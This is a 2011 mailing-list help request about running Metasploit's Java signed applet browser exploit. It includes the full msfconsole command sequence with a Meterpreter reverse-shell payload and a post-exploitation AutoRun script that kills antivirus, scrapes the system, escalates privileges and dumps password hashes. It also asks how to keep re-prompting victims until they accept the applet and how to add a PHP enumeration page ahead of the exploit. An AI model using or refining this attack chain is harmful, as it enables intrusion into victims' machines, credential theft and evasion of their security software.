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HELP: metasploit v3.8.0-dev (Java UNsigned Applet) and meterpreter AutoRun scripts.

From: Richard Miles <richard.k.miles () googlemail com>
Date: Thu, 16 Jun 2011 16:18:53 -0500


1) I want to test the Java Signed Applet, I'm using version metasploit
v3.8.0-dev, I'm following this tutorial:


It works, however I still get it with bad digital signature. Below is
how I'm executing it:

use exploit/multi/browser/java_signed_applet
set PAYLOAD windows/meterpreter/reverse_tcp_allports
set AutoRunScript multiscript -s /root/script.rc
set APPLETNAME CompanyName
set CERTCN Santo CompanyName
set SRVPORT 80
set ExitOnSession false
exploit -j -z

And it works, but I always see on the browser as an unsigned (bad
digital signature). What I'm doing wrong?

b) Also, on my script.rc I have:

run killav
run scraper
run getprivs
run hashdump
dir c:\
migrate -f

But on the output of msfconsole I just see:

meterpreter > run multi_console_command -s /root/dump.rc
[*] Running Command List ...
meterpreter >

And I never see the output.

I basically just want to do the following once a connection with
meterpreter is estabilished.

- get a screenshot
- get sysinfo and getuid
- run killav and scraper
- launch getpriv
- execute hashdump
- execute "dir c:\" and "ps".
- call migrate -f (create an notepad and migrate to it)
- sleep 45 seconds and get another screenshot.

Can someone help me how to do it? I want to see all output on the
msfconsole or save locally on the msfconsole machine. How?

C) There is a way to tell metasploit to reload Java Signed Applet
exploit until user click "yes"?

D) I would love to have an .php script doing basic enumeration of my
target before execute Java Signed Applet, there is a way to launch
this exploit in Apache or any other way that I can first execute an
.php scrip and then redirect to the Java Signed Applet exploit?

Thanks a lot.

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